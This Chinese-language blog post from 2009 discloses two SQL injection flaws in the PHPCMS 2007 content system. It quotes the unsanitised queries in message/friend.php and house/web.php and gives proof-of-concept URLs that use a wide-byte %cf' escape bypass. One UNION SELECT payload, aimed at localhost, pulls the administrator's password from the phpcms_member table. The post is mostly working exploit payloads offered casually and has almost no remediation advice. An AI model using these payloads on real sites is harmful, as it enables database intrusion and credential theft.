phpcms 2007 最后的两个注射.

2009年8月23日星期日 | | |

为什么说是最后的两个注射呢?因为这个2007版的PHPCMS已经木人研究了,现在发两个我和luoye发现的小洞

都玩烂了的,大大们别笑哈~~


====================================================================

message/friend.php

............................................................
if ($_username != $username)
{
if ($action == 'add')
{
$res = $db->query("SELECT userid FROM ".TABLE_MEMBER." where username='$username'");
............................................................

http://127.0.0.1/phpcms/message/friend.php?action=add&username=luoye%cf'

=====================================================================


house/web.php

............................................................
if($username)
{
    $r = $db->get_one("SELECT * FROM ".TABLE_MEMBER." m,".TABLE_MEMBER_INFO." i WHERE m.username='".$username."' AND m.userid=i.userid");
............................................................

http://127.0.0.1/phpcms/house/web.php?username=luoye%cf'

=====================================================================


Test for sp6:http://127.0.0.1/phpcms/house/web.php?username=luoye% cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,password,65/**/from/**/phpcms_member/**/where/**/userid=1/*



我的QQ空间
笔记本 microsoft ACPI-Compliant System 无法驱动 解决方案
今天安装HP540 笔记本XP系统,系统做好后安装驱动发现"micr...
 

0 评论:

发表评论

订阅: 博文评论 (Atom)

所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]

 
Glossy Blue by N.Design Studio
Blogger Templates by Blogcrowds | Glossy Blue Blogger Template